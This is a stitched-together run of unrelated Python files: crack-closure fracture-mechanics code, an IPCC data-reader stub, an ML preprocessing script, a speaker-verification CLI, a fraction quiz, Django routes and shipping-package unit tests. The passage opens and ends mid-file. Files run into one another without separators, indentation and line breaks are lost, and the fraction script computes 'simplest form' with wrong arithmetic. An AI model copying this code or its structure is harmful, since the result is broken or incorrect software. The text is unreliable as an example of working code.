weightfun_through_times_sqrt_aminx(x,a,width), epsx=epsx, Eeff=Eeff, surrogate_a=x, use_surrogate=True) pass pass def ModeI_throughcrack_weightfun(Eeff,x,epsx): ## Basic weight function from Fett & Munz Stress Intensity Factors and Weight Functions eq. 1.2.5 # Equivalent to # Basic weight function from Anderson, Fracture Mechanics, Example 2.6 (page 57) # Weight function given as h(x) = \pm (1/sqrt(pi*a)) * sqrt(x/(2a-x)) # ... But the coordinate frame is weird. From Fig 2.27 on page 58, # x=0 is at the other end of the crack (!) versus our origin is # the center of the crack. Let x' = x-a -> x=x'+a # Now h(x') = \pm (1/sqrt(pi*a)) * sqrt((x'+a)/(2a-x'-a)) # h(x') = \pm (1/sqrt(pi*a)) * sqrt((x'+a)/(a-x')) # #def weightfun_basic_times_sqrt_aminx(x,a): # return np.sqrt(1.0/(np.pi*a))*np.sqrt((a+x)) # Corrected for origin being at center of crack, not tip. # See corrected_tunnelcrack_weightfun.pdf def weightfun_basic_times_sqrt_aminx(x,a): return (1.0/np.sqrt(np.pi))*np.sqrt(a)/np.sqrt(a+x) return ModeI_Beta_WeightFunction(weightfun_times_sqrt_aminx=lambda obj,x,a: weightfun_basic_times_sqrt_aminx(x,a), epsx=epsx, Eeff=Eeff, surrogate_a=x, use_surrogate=True) class ModeI_throughcrack_CODformula(ModeI_Beta_COD_Formula): Symmetric_COD = None def r0_over_a(self,xt): """ The baseline approximation of the stress field beyond the crack tip is K/sqrt(2*pi*r), but this is only valid within perhaps a/10 of the tip. Initially we approximated the stress field as K/sqrt(2*pi*r) + sigma_infty so that the stress would approach the correct value as r -> infty. Unfortunately this doesn't satisfy force balance (in fact if you integrate it, it fails to converge!). So our fix is to approximate the stress field as (K/sqrt(2*pi*r))*(r0^2/(r+r0)^2) + sigma_infty, where r0 is selected to satisfy force balance between the load not held over the cracked region and the stress concentration beyond the tip. r0 is the characteristic radius for the 1/r^2 decay of the 1/sqrt(r) term Assuming K has the form sigma*sqrt(pi*a*beta) for a through crack in a thin plate, then per total_load_matching_crossterm_r2_work.pdf r0 = 8a/(pi^2*beta) """ return 8.0/((np.pi**2.0)*self.beta(self)) def __init__(self,Eeff,Symmetric_COD): """Eeff is the effective modulus (just E for plane stress, E/(1-nu^2) for plane strain) Symmetric_COD should be True or False depending on whether you want to use the crack-center symmetric (elliptical displacement) form of the COD expression (suitable for a 2-sided crack) or the asymmetric form (suitable for an edge crack)""" self.Symmetric_COD=Symmetric_COD def u_per_unit_stress(Eeff,x,xt): # half-opening displacement over sigma_applied # Non weightfunction method: # Old method: Based on Suresh eq. 9.45. # The problem with the old method is it is based # on a near-tip approximation #Kappa = (3.0-nu)/(1.0+nu) # #KI = sigma_applied*np.sqrt(np.pi*(xt)) #theta = np.pi #u = (KI/(2.0*E))*(np.sqrt((xt-x)/(2.0*np.pi)))*((1.0+nu)* # (((2.0*Kappa+1.0)*(np.sin(theta/2.0)))-np.sin(3.0*theta/2.0))) # New Method: Based on Anderson, eq. A2.43 (Symmetric_COD) # uy = 2(sigma/Eeff)*sqrt(a^2-x^2) # uy = 2(sigma/Eeff)*sqrt((a+x)(a-x)) #Eeff = E if Symmetric_COD: # Anderson, eq A2.43 u_per_unit_stress = (2/Eeff)*np.sqrt((xt+x)*(xt-x)) pass else: # Anderson, table 2.2: # uy = (KI/(2mu)) sqrt((xt-x)/(2pi)) (kappa + 1) # kappa = (3-nu)/(1+nu) (plane stress) # kappa = (3-4nu) (plane strain) # so kappa + 1 = # kappa + 1 = (3-nu +1 +nu)/(1+nu) # = 4/(1+nu) (plane stress) # kappa + 1 = 4(1-nu) plane strain # # and mu = E/(2*(1+nu)) # so # uy = (KI/E) (1+nu) sqrt((xt-x)/(2pi)) (4/(1+nu)) (plane stress) # uy = 4 * (KI/E) sqrt((xt-x)/(2pi)) (plane stress) # uy = (KI/E) (1+nu) sqrt((xt-x)/(2pi)) 4(1-nu) (plane strain) # uy = 4 * (KI/E) sqrt((xt-x)/(2pi)) * (1+nu)(1-nu) (plane strain) # uy = 4 * (KI/E) sqrt((xt-x)/(2pi)) * (1-nu^2) (plane strain) # letting Eeff = E (plane stress) or Eeff = E/(1-nu^2) (plane strain), # uy = 4 * (KI/Eeff) sqrt((xt-x)/(2pi)) # where KI = sigma_inf *sqrt(pi*xt*beta) (beta=1 in this case) # so u_per_unit_stress = (4*sqrt(pi*xt)/Eeff) * sqrt((xt-x)/(2pi)) # u_per_unit_stress = (4*sqrt(a)/Eeff) * sqrt((xt-x)/(2)) u_per_unit_stress = (4.0*np.sqrt(xt)/Eeff)*np.sqrt((xt-x)/2.0) pass return u_per_unit_stress super(ModeI_throughcrack_CODformula, self).__init__(Eeff=Eeff, beta=lambda obj: 1.0, u_per_unit_stress = lambda obj,x,xt: u_per_unit_stress(obj.Eeff,x,xt)) pass pass class Tada_ModeI_CircularCrack_along_midline(ModeI_Beta_COD_Formula): def r0_over_a(self,xt): """Based on calculation given in total_load_matching_crossterm_r2_work.pdf """ return (2.0**(1.0/3.0))/((np.pi**(2.0/3.0))*(self.beta(self)**(1.0/3.0))) def __init__(self,E,nu): def u_per_unit_stress(E,nu,x,xt): # half opening displacement # For a circular crack in an infinite space, # loaded in mode I. # We will be evaluating along a line through the crack center # Based on ., ., & . (2000). The stress analysis of cracks handbook / , , . (3rd ed.). New York: ASME Press. u_per_unit_stress = (4.0*(1-nu**2.0)/(np.pi*E)) * np.sqrt(xt**2.0 - x**2.0) return u_per_unit_stress super(Tada_ModeI_CircularCrack_along_midline, self).__init__(E=E, nu=nu, beta=lambda obj: 4.0/(np.pi**2.0), u_per_unit_stress = lambda obj,x,xt: u_per_unit_stress(obj.E,obj.nu,x,xt)) pass pass def perform_inverse_closure(inputfilename,E,nu,sigma_yield,CrackCenterX,dx,specimen_id,hascrackside1=True,hascrackside2=True): from matplotlib import pyplot as pl import pandas as pd #tau_yield = sigma_yield/2.0 # limits stress concentration around singularity # read closure profile cpdata = pd.read_csv(inputfilename,index_col="Opening load (Pa)") loads = np.array(cpdata.index) tippos_side1 = None tippos_side2 = None if "xt (side 1, m)" in cpdata: tippos_side1 = np.array(cpdata["xt (side 1, m)"]) assert(hascrackside1) pass if "xt (side 2, m)" in cpdata: tippos_side2 = np.array(cpdata["xt (side 2, m)"]) assert(hascrackside2) pass #cpdata = np.loadtxt(inputfilename,skiprows=1,delimiter=',') #assert(cpdata.shape[1]==3) #loads = cpdata[:,0] #tippos_side1 = cpdata[:,1] #tippos_side2 = cpdata[:,2] sigmaext_max=np.max(loads) a_side1=0.0 a_side2=0.0 # side 1 (left side) if tippos_side1 is not None: observed_reff_side1 = CrackCenterX - tippos_side1 observed_seff_side1 = loads a_side1=np.max(observed_reff_side1) pass # side 2 (right side) if tippos_side2 is not None: observed_reff_side2 = tippos_side2 - CrackCenterX observed_seff_side2 = loads a_side2=np.max(observed_reff_side2) pass # here, x really measures radius past crack center xmax_approx = 2.0*max(a_side1,a_side2) # x array goes past tip position (twice half-length) #dx = 25e-6 xsteps = int(xmax_approx//dx) xmax = dx*xsteps x_bnd=np.arange(xsteps,dtype='d')*dx x = (x_bnd[1:]+x_bnd[:-1])/2.0 #weightfun_epsx = dx/8.0 crack_model = Tada_ModeI_CircularCrack_along_midline(E,nu) sigma_closure_side1 = None sigma_closure_side2 = None if tippos_side1 is not None: sigma_closure_side1 = inverse_closure(observed_reff_side1[observed_reff_side1 >= 0.0], observed_seff_side1[observed_reff_side1 >= 0.0], x,x_bnd,dx,a_side1,sigma_yield, crack_model) pass if tippos_side2 is not None: sigma_closure_side2 = inverse_closure(observed_reff_side2[observed_reff_side2 >= 0.0], observed_seff_side2[observed_reff_side2 >= 0.0], x,x_bnd,dx,a_side2,sigma_yield, crack_model) pass side1fig = None side2fig = None # Forward cross-check of closure if tippos_side1 is not None: side1fig=pl.figure() pl.plot(x[x < a_side1]*1e6,sigma_closure_side1[x < a_side1]/1e6,'-', observed_reff_side1*1e6,observed_seff_side1/1e6,'x') for observcnt in range(len(observed_reff_side1)): (effective_length, sigma, tensile_displ, dsigmaext_dxt) = solve_normalstress(x,x_bnd,sigma_closure_side1,dx,observed_seff_side1[observcnt],a_side1,sigma_yield,crack_model) pl.plot(effective_length*1e6,observed_seff_side1[observcnt]/1e6,'.') #pl.plot(x*1e3,tensile_displ*1e15,'-') pass pl.grid() pl.legend(('Closure stress field','Observed crack tip posn','Recon. crack tip posn'),loc="best") pl.xlabel('Radius from crack center (um)') pl.ylabel('Stress (MPa)') if specimen_id is not None: pl.title('%s: Side 1 (left)' % (specimen_id)) pass else: pl.title('Side 1 (left)') pass side2fig=pl.figure() pl.plot(x[x < a_side2]*1e6,sigma_closure_side2[x < a_side2]/1e6,'-', observed_reff_side2*1e6,observed_seff_side2/1e6,'x') for observcnt in range(len(observed_reff_side2)): (effective_length, sigma, tensile_displ, dsigmaext_dxt) = solve_normalstress(x,x_bnd,sigma_closure_side2,dx,observed_seff_side2[observcnt],a_side2,sigma_yield,crack_model) pl.plot(effective_length*1e6,observed_seff_side2[observcnt]/1e6,'.') #pl.plot(x*1e3,tensile_displ*1e15,'-') pass pl.grid() pl.legend(('Closure stress field','Observed crack tip posn','Recon. crack tip posn'),loc="best") if specimen_id is not None: pl.title('%s: Side 2 (right)' % (specimen_id)) pass else: pl.title('Side 2 (right)') pass pl.xlabel('Radius from crack center (um)') pl.ylabel('Stress (MPa)') pass return (x,x_bnd,a_side1,a_side2,sigma_closure_side1,sigma_closure_side2,side1fig,side2fig) def save_closurestress(filename,x,sigma_closure,a,crackopening=None): """ NOTE: crackopening should be the half-crackopening!!!""" import pandas as pd nrows = np.count_nonzero(x <= a)+1 out_frame = pd.DataFrame(index=pd.Float64Index(data=x[:nrows],dtype='d',name="Crack radius (m) compared to crack (half) length a=%.8g m" % (a))) out_frame.insert(len(out_frame.columns),"Closure stress (Pa)", sigma_closure[:nrows]) if crackopening is not None: out_frame.insert(len(out_frame.columns),"Crack opening (m)", crackopening[:nrows]) pass out_frame.to_csv(filename) # #with open(filename,"wb") as csvfile: # cpwriter = csv.writer(csvfile) # columntitles = ["Crack radius (m)","Closure stress (Pa)"] # if crackopening is not None: # columntitles.append("Crack opening (m)") # pass # cpwriter.writerow(columntitles) # # if crackopening is None: # for poscnt in range(np.count_nonzero(x <= a)): # cpwriter.writerow([ x[poscnt], sigma_closure[poscnt]]) # pass # pass # else: # for poscnt in range(np.count_nonzero(x <= a)): # cpwriter.writerow([ x[poscnt], sigma_closure[poscnt], crackopening[poscnt]]) # pass # pass # pass pass def load_closurestress(filename): """ returns (x,x_bnd,xstep,a,sigma_closure,crack_opening)... crack_opening returned (if present) is half_crackopening""" import pandas as pd closurestress_dataframe = pd.read_csv(filename,index_col=0) # determine crack length a from index title if possible if closurestress_dataframe.index.name=="Crack radius (m)": a = None # Not encoded else: matchobj = re.match(r"""Crack radius \(m\) compared to crack \(half\) length a=([-+]?(\d+(\.\d*)?|\.\d+)([eE][-+]?\d+)?) m""",closurestress_dataframe.index.name) if matchobj is None: raise ValueError("Failed to parse crack length from index title \"%s\"" % (closurestress_dataframe.index.name)) a = float(matchobj.group(1)) pass x = np.array(closurestress_dataframe.index) xstep = x[1]-x[0] if a is None: # Old version of save_closurestress that # didn't include crack length in header didn't go # at all beyond crack length... but we need # at least one sample beyond x = np.concatenate((x,(x[-1]+xstep,))) pass x_bnd = np.concatenate(((x[0]-xstep/2.0,),x+xstep/2.0)) if x_bnd[0] < 0.0: x_bnd[0]=0.0 pass sigma_closure = np.array(closurestress_dataframe["Closure stress (Pa)"]) if a is None: # expand out sigma_closure by one sample sigma_closure = np.concatenate((sigma_closure,(0.0,))) pass if "Crack opening (m)" in closurestress_dataframe.keys(): crack_opening = np.array(closurestress_dataframe["Crack opening (m)"]) if a is None: # expand out crack_opening by one sample crack_opening = np.concatenate((crack_opening,(0.0,))) pass pass else: crack_opening = None pass return (x,x_bnd,xstep,a,sigma_closure,crack_opening) hdrake/process-ipcc import numpy as np class far_variable(): pass class cipher: def __init__(self,name): self.name = name self.var_list = None def get_byte_index(self,idx): baseline_idx = self.bytes_per_data_entry byte_idx = self.nbytes_header_cw + self.nbytes_header + self.nbytes_data_cw for (ndim, dim_idx) in zip(self.dims, list(range(len(self.dims)))): byte_idx += baseline_idx * idx[dim_idx] baseline_idx *= self.dims[dim_idx] if dim_idx == self.data_cw_dim: baseline_idx += self.nbytes_data_cw return byte_idxdef generate_rf_page_object(): path = "" page_structure_csv = "" rf_keywords = "" default_action = ["Wait Until Element Is Visible", "Wait Until Element Is Enabled"]import unittest from coverage import Coverage import sys import os import test if __name__ == '__main__': # the directory change is done to ease the use of relative # paths in the unit tests os.chdir("./tests") sys.path.append(os.getcwd()) suite = unittest.TestSuite() cov = Coverage() cov.start() for test in unittest.TestLoader().discover("test"): suite.addTest(test) unittest.TextTestRunner(verbosity=2).run(suite) cov.stop() cov.save() cov.report(show_missing=True, omit=['test_*.py', '*/__init__.py']) rizwan09/REDCODER10-100 #!/usr/bin/env python # Copyright (c) Facebook, Inc. and its affiliates. # All rights reserved. # # This source code is licensed under the license found in the # LICENSE file in the root directory of this source tree. import argparse import json import os from tqdm import tqdm from multiprocessing import Pool import sentencepiece as spm from python_tokenizer import python_code_tokenize class MultiprocessingEncoder(object): def __init__(self, args): self.keep_empty = args.keep_empty self.max_src_len = args.max_src_len self.max_tgt_len = args.max_tgt_len self.sp = spm.SentencePieceProcessor(model_file=args.model_file) def initializer(self): pass def _encode(self, line): return self.sp.encode(line, out_type=str) def _decode(self, tokens): return self.sp.decode(tokens) def encode(self, example): assert isinstance(example, dict) assert 'src' in example and 'tgt' in example if len(example['src']) == 0 and not self.keep_empty: return None if len(example['tgt']) == 0 and not self.keep_empty: return None src_tokens = self._encode(example['src'])[:self.max_src_len] tgt_tokens = self._encode(example['tgt'])[:self.max_tgt_len] return {'src': " ".join(src_tokens), 'tgt': " ".join(tgt_tokens)} def load_data(input_file, src_field, tgt_field, src_lang, top_k, WITH_WITHOUT_SUFFIX): data = [] with open(input_file) as f: retrieved_code = json.load(f) for idx, ex in enumerate(tqdm(retrieved_code, total=len(retrieved_code))): try: src = ex[src_field] except: ex=retrieved_code[ex] assert src_field in ex and tgt_field in ex src = ex[src_field] src = src.replace('\n', ' ').strip() tgt = ex[tgt_field] if isinstance(tgt, list): tgt = " ".join(tgt) tgt = tgt.replace('\n', ' ').strip() if top_k > 0: inserted = 0 for rank, ctx in enumerate(ex['ctxs']): if WITH_WITHOUT_SUFFIX=="with": src += ' _NL_SEP_ ' + ctx["text"].split('_NL_')[0].strip() inserted += 1 if inserted >= top_k: break else: if tgt.strip()!= ctx["text"].split('_NL_')[0].strip(): #for retrieving without ref code but includes other codes in the test corpus src += ' _NL_SEP_ ' + ctx["text"].split('_NL_')[0].strip() inserted += 1 if inserted >= top_k: break src = src.replace('\n', ' ').strip() data.append({'src': src, 'tgt': tgt}) return data def process(args): dataset = load_data(args.input_file, args.src_field, args.tgt_field, args.src_lang, top_k=args.top_k, WITH_WITHOUT_SUFFIX=args.WITH_WITHOUT_SUFFIX) encoder = MultiprocessingEncoder(args) pool = Pool(args.workers, initializer=encoder.initializer) processed_dataset = [] with tqdm(total=len(dataset), desc='Processing') as pbar: for i, ex in enumerate(pool.imap(encoder.encode, dataset, 100)): pbar.update() processed_dataset.append(ex) out_src = os.path.join(args.output_dir, '{}.spm.{}'.format(args.pref, args.src_lang)) out_tgt = os.path.join(args.output_dir, '{}.spm.{}'.format(args.pref, args.tgt_lang)) with open(out_src, 'w', encoding='utf-8') as src_writer, \ open(out_tgt, 'w', encoding='utf-8') as tgt_writer: for ex in processed_dataset: if ex is not None: src_writer.write(ex['src'] + '\n') tgt_writer.write(ex['tgt'] + '\n') def main(): parser = argparse.ArgumentParser() parser.add_argument( "--model-file", help='path to *.model file', ) parser.add_argument( "--input_file", type=str, default=['-'], help="input files (.jsonl) to filter/encode", ) parser.add_argument( "--output_dir", type=str, default=['_'], help="path of the output directory", ) parser.add_argument( "--src_field", type=str, default=['_'], help="field name to be considered as the source", ) parser.add_argument( "--tgt_field", type=str, default=['_'], help="field name to be considered as the source", ) parser.add_argument( "--src_lang", type=str, default=['_'], help="name of the source language", ) parser.add_argument( "--tgt_lang", type=str, default=['_'], help="name of the target language", ) parser.add_argument( "--pref", type=str, default=['_'], help="file prefix", ) parser.add_argument( "--keep-empty", action="store_true", help="keep empty lines", ) parser.add_argument("--max_src_len", type=int, default=512) parser.add_argument("--max_tgt_len", type=int, default=512) parser.add_argument("--workers", type=int, default=60) parser.add_argument("--WITH_WITHOUT_SUFFIX", type=str, default="with") parser.add_argument("--top_k", type=int, default=5) args = parser.parse_args() process(args) if __name__ == "__main__": main() import sys from gmm import save_model, predict from seg import vadSeg, segment if __name__ == '__main__': if len(sys.argv) == 1: print('help: python main.py [task] [model|wav]') exit() task = sys.argv[1] if task == 'train': speech = sys.argv[2] save_model(speech.replace('.wav', '.mdl'), speech) print('done.') elif task == 'seg': model = sys.argv[2] dialogue = sys.argv[3] vadSeg(model, dialogue) print('done.') elif task == 'verify': model = sys.argv[2] speech = sys.argv[3] score = predict(model, speech) print('yes') if score < 50 else print('no') # Instructions: # Just run the file and answer the questions! # -------------------------------------------------------------------- while True: first_fraction_str = input("What is the first fraction? Please separate the two numbers by a comma!\n") print("") second_fraction_str = input("What is the second fraction? Please separate the two numbers by a comma\n") first_fraction_str = first_fraction_str.split(",") second_fraction_str = second_fraction_str.split(",") first_fraction = [] second_fraction = [] for number in first_fraction_str: new_number = int(number) first_fraction.append(new_number) for number in second_fraction_str: new_number = int(number) second_fraction.append(new_number) fraction1_simplest = (first_fraction[0] / first_fraction[0]) / (first_fraction[1] / first_fraction[0]) fraction2_simplest = (second_fraction[0] / second_fraction[0]) / (second_fraction[1] / second_fraction[0]) if fraction1_simplest == fraction2_simplest: print("") print("The two ratios form a proportion!") print("Ratio one's simplest form:", fraction1_simplest) print("Ratio two's simplest form:", fraction2_simplest) print("") continue_question = input("Would you like to do another calculation?\n") if "y" in continue_question.lower(): for i in range(15): print("") continue else: break elif fraction1_simplest != fraction2_simplest: print("") print("The two ratios don't form a proportion!") print("Ratio one's simplest form:", fraction1_simplest) print("Ratio two's simplest form:", fraction2_simplest) print("") continue_question = input("Would you like to do another calculation?\n") if "y" in continue_question.lower(): for i in range(15): print("") continue else: break else: print("") print("Please put in a valid data type") for i in range(15): print("") continue ptyadana/python-dojo1-10 # Question: Please create a script that generates 26 text files named a.txt, b.txt, # and so on up to z.txt. Each file should contain a letter reflecting its filename. # So, a.txt will contain letter a, b.txt will contain letter b and so on. # Answer: import string def create_file_by_letter(letter): with open('./output_45/'+letter+'.txt','w') as file: file.write(letter) def files_for_each_alphabets(): for letter in string.ascii_lowercase: create_file_by_letter(letter) if __name__ == "__main__": files_for_each_alphabets() Micha546/TasKing0 from django.urls import path from . import views urlpatterns = [ path('my-groups', views.my_groups, name='mygroups'), path('group//', views.view_group, name='groups'), path('assign//', views.assign, name='assign'), path('approve//', views.approve, name='approve'), path('delete//', views.delete_group, name='delete_group'), ] 1-10 __version__ = '1.10.2' devsdmf/correios-python-sdk # -*- coding: utf-8 -*- import unittest from correios.package import Package, BoxPackage, CylinderPackage, EnvelopePackage class TestPackage(unittest.TestCase): def setUp(self): pass def test_create_package(self): package = Package() self.assertEqual(Package.FORMAT_BOX,package.get_format()) def test_create_package_with_different_format(self): package = Package(Package.FORMAT_CYLINDER) self.assertEqual(Package.FORMAT_CYLINDER,package.get_format()) def test_package_is_format(self): package = Package(Package.FORMAT_CYLINDER) self.assertTrue(package.is_format(Package.FORMAT_CYLINDER)) def test_abstract_add_item_raises_exception(self): package = Package() with self.assertRaises(NotImplementedError): package.add_item() def test_check_for_items_in_emtpy_package(self): package = Package() self.assertFalse(package.has_items()) def test_check_for_items_in_non_empty_package(self): package = Package() package.items = [1] self.assertTrue(package.has_items()) def test_get_items_from_empty_package(self): package = Package() items = package.get_items() self.assertEqual(0,len(items)) def test_get_items_from_non_empty_package(self): package = Package() package.items = [1] items = package.get_items() self.assertGreater(len(items),0) def test_abstract_get_dimensions_raises_exception(self): package = Package() with self.assertRaises(NotImplementedError): package.get_dimensions() def test_get_weight_from_empty_package(self): package = Package() self.assertEqual(Package.MIN_WEIGHT,package.get_weight()) def test_abstract_is_valid_raises_exception(self): package = Package() with self.assertRaises(NotImplementedError): package.is_valid() def test_abstract_api_format_raises_exception(self): package = Package() with self.assertRaises(NotImplementedError): package.api_format() class TestBoxPackage(unittest.TestCase): def setUp(self): pass def test_create_box_package(self): package = BoxPackage() self.assertEqual(Package.FORMAT_BOX,package.get_format()) def test_add_single_item_to_box_package(self): height = 1.0 width = 2.0 depth = 3.0 weight = 0.3 package = BoxPackage() package.add_item(height,width,depth,weight) self.assertTrue(package.has_items()) self.assertEqual(height,package.get_items()[0].height) self.assertEqual(width,package.get_items()[0].width) self.assertEqual(depth,package.get_items()[0].depth) self.assertEqual(weight,package.get_items()[0].weight) def test_add_multiple_items_to_box_package(self): height0 = 1.0 width0 = 2.0 depth0 = 3.0 weight0 = 0.3 height1 = 2.0 width1 = 3.0 depth1 = 4.0 weight1 = 1.0 package = BoxPackage() package.add_item(height0,width0,depth0,weight0) package.add_item(height1,width1,depth1,weight1) self.assertTrue(package.has_items()) self.assertEqual(height0,package.get_items()[0].height) self.assertEqual(width0,package.get_items()[0].width) self.assertEqual(depth0,package.get_items()[0].depth) self.assertEqual(weight0,package.get_items()[0].weight) self.assertEqual(height1,package.get_items()[1].height) self.assertEqual(width1,package.get_items()[1].width) self.assertEqual(depth1,package.get_items()[1].depth) self.assertEqual(weight1,package.get_items()[1].weight) def test_get_dimensions_for_single_item_box_package_with_minimum_dimensions(self): height = 1.0 width = 2.0 depth = 3.0 package = BoxPackage() package.add_item(height,width,depth,0.3) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(BoxPackage.MIN_HEIGHT,BoxPackage.MIN_WIDTH,BoxPackage.MIN_DEPTH)) def test_get_dimensions_for_single_item_box_package_with_dimensions_over_the_minimum(self): height = 15.0 width = 20.0 depth = 25.0 package = BoxPackage() package.add_item(height,width,depth,0.3) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(height,width,depth)) def test_get_dimensions_for_multiple_items_box_package_with_minimum_dimensions(self): height0 = 0.5 width0 = 0.5 depth0 = 0.5 weight0 = 0.3 height1 = 0.5 width1 = 0.8 depth1 = 0.6 weight1 = 1.0 package = BoxPackage() package.add_item(height0,width0,depth0,weight0) package.add_item(height1,width1,depth1,weight1) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(BoxPackage.MIN_HEIGHT,BoxPackage.MIN_WIDTH,BoxPackage.MIN_DEPTH)) def test_get_dimensions_for_multiple_items_box_package_with_dimensions_over_the_minimum(self): height0 = 10 width0 = 12 depth0 = 25 weight0 = 0.3 height1 = 6 width1 = 14 depth1 = 20 weight1 = 1.0 package = BoxPackage() package.add_item(height0,width0,depth0,weight0) package.add_item(height1,width1,depth1,weight1) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(height0 + height1,width1,depth0)) def test_get_weight_of_box_package(self): weight0 = 0.5 weight1 = 1.5 package = BoxPackage() package.add_item(1.0,2.0,3.0,weight0) package.add_item(2.0,3.0,5.0,weight1) self.assertEqual(weight0 + weight1,package.get_weight()) def test_check_for_valid_box_package_with_valid_dimensions(self): package = BoxPackage() package.add_item(15.0,20.0,35.0,1.2) self.assertTrue(package.is_valid()) def test_check_for_valid_box_package_with_exceeded_dimensions(self): package = BoxPackage() package.add_item(BoxPackage.MAX_HEIGHT+1.0,BoxPackage.MAX_WIDTH+1.0,BoxPackage.MAX_DEPTH+1.0,2.0) self.assertFalse(package.is_valid()) def test_check_for_valid_box_package_with_exceeded_volume(self): package = BoxPackage() package.add_item(100.0,100.0,100.0,5.0) self.assertFalse(package.is_valid()) def test_api_format_for_valid_box_package(self): height = 15.0 width = 20.0 depth = 35.0 weight = 1.2 package = BoxPackage() package.add_item(height,width,depth,weight) expected = { 'nCdFormato': Package.FORMAT_BOX, 'nVlAltura': height, 'nVlLargura': width, 'nVlComprimento': depth, 'nVlPeso': weight } self.assertDictEqual(package.api_format(),expected) def test_api_format_for_invalid_box_package(self): package = BoxPackage() package.add_item(100.0,100.0,100.0,5.0) with self.assertRaises(Exception): package.api_format() class TestCylinderPackage(unittest.TestCase): def setUp(self): pass def test_create_cylinder_package(self): package = CylinderPackage() self.assertEqual(Package.FORMAT_CYLINDER,package.get_format()) def test_add_single_item_to_cylinder_package(self): length = 5.0 diameter = 1.0 weight = 0.5 package = CylinderPackage() package.add_item(length,diameter,weight) self.assertTrue(package.has_items()) self.assertEqual(length,package.get_items()[0].length) self.assertEqual(diameter,package.get_items()[0].diameter) self.assertEqual(weight,package.get_items()[0].weight) def test_add_multiple_items_to_cylinder_package(self): length0 = 5.0 diameter0 = 1.0 weight0 = 0.3 length1 = 10.0 diameter1 = 2.0 weight1 = 0.5 package = CylinderPackage() package.add_item(length0,diameter0,weight0) package.add_item(length1,diameter1,weight1) self.assertTrue(package.has_items()) self.assertEqual(length0,package.get_items()[0].length) self.assertEqual(diameter0,package.get_items()[0].diameter) self.assertEqual(weight0,package.get_items()[0].weight) self.assertEqual(length1,package.get_items()[1].length) self.assertEqual(diameter1,package.get_items()[1].diameter) self.assertEqual(weight1,package.get_items()[1].weight) def test_get_dimensions_for_single_item_cylinder_package_with_minimum_dimensions(self): length = 5.0 diameter = 1.0 package = CylinderPackage() package.add_item(length,diameter,0.5) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(CylinderPackage.MIN_LENGTH,CylinderPackage.MIN_DIAMETER)) def test_get_dimensions_for_single_item_cylinder_package_with_dimensions_over_the_minimum(self): length = 60.0 diameter = 10.0 package = CylinderPackage() package.add_item(length,diameter,2.0) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(length,diameter)) def test_get_dimensions_for_multiple_items_cylinder_package_with_minimum_dimensions(self): length0 = 5.0 diameter0 = 1.0 length1 = 10.0 diameter1 = 2.0 package = CylinderPackage() package.add_item(length0,diameter0,0.5) package.add_item(length1,diameter1,0.8) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(CylinderPackage.MIN_LENGTH,CylinderPackage.MIN_DIAMETER)) def test_get_dimensions_for_multiple_items_cylinder_package_with_dimensions_over_the_minimum(self): length0 = 25.0 diameter0 = 5.0 length1 = 30.0 diameter1 = 12.0 package = CylinderPackage() package.add_item(length0,diameter0,0.5) package.add_item(length1,diameter1,0.8) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(length0 + length1,diameter1)) def test_get_weight_of_cylinder_package(self): weight0 = 5.0 weight1 = 12.5 package = CylinderPackage() package.add_item(1.0,2.0,weight0) package.add_item(2.0,3.0,weight1) self.assertEqual(package.get_weight(),weight0 + weight1) def test_check_for_valid_cylinder_package_with_valid_dimensions(self): package = CylinderPackage() package.add_item(40.0,10.0,0.5) self.assertTrue(package.is_valid()) def test_check_for_valid_cylinder_package_with_exceeded_dimensions(self): package = CylinderPackage() package.add_item(150.0,2.0,0.5) self.assertFalse(package.is_valid()) def test_check_for_valid_cylinder_package_with_exceeded_volume(self): package = CylinderPackage() package.add_item(102.0,50.0,1.0) self.assertFalse(package.is_valid()) def test_api_format_for_valid_cylinder_package(self): length = 40.0 diameter = 10.0 weight = 1.0 package = CylinderPackage() package.add_item(length,diameter,weight) expected = { 'nCdFormato': Package.FORMAT_CYLINDER, 'nVlComprimento': length, 'nVlDiametro': diameter, 'nVlPeso': weight } self.assertDictEqual(package.api_format(),expected) def test_api_format_for_invalid_cylinder_package(self): package = CylinderPackage() package.add_item(102.5,50.0,5.0) with self.assertRaises(Exception): package.api_format() class TestEnvelopePackage(unittest.TestCase): def setUp(self): pass def test_create_envelope_package(self): package = EnvelopePackage() self.assertEqual(Package.FORMAT_ENVELOPE,package.get_format()) def test_add_single_item_to_envelope_package(self): width = 11.0 length = 20.0 weight = 0.3 package = EnvelopePackage() package.add_item(width,length,weight) self.assertTrue(package.has_items()) self.assertEqual(width,package.get_items()[0].width) self.assertEqual(length,package.get_items()[0].length) self.assertEqual(weight,package.get_items()[0].weight) def test_add_multiple_items_to_envelope_package(self): width0 = 11.0 length0 = 20.0 weight0 = 0.3 width1 = 15.0 length1 = 25.0 weight1 = 0.5 package = EnvelopePackage() package.add_item(width0,length0,weight0) package.add_item(width1,length1,weight1) self.assertTrue(package.has_items()) self.assertEqual(width0,package.get_items()[0].width) self.assertEqual(length0,package.get_items()[0].length) self.assertEqual(weight0,package.get_items()[0].weight) self.assertEqual(width1,package.get_items()[1].width) self.assertEqual(length1,package.get_items()[1].length) self.assertEqual(weight1,package.get_items()[1].weight) def test_get_dimensions_for_single_item_envelope_package_with_minimum_dimensions(self): width = 5.0 length = 10.0 package = EnvelopePackage() package.add_item(width,length,0.3) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(EnvelopePackage.MIN_WIDTH,EnvelopePackage.MIN_LENGTH)) def test_get_dimensions_for_single_item_envelope_package_with_dimensions_over_the_minimum(self): width = 25.0 length = 40.0 package = EnvelopePackage() package.add_item(width,length,0.5) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(width,length)) def test_get_dimensions_for_multiple_items_envelope_package_with_minimum_dimensions(self): width0 = 5.0 length0 = 5.0 width1 = 10.0 length1 = 10.0 package = EnvelopePackage() package.add_item(width0,length0,0.5) package.add_item(width1,length1,0.8) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(EnvelopePackage.MIN_WIDTH,EnvelopePackage.MIN_LENGTH)) def test_get_dimensions_for_multiple_items_envelope_package_with_dimensions_over_the_minimum(self): width0 = 20.0 length0 = 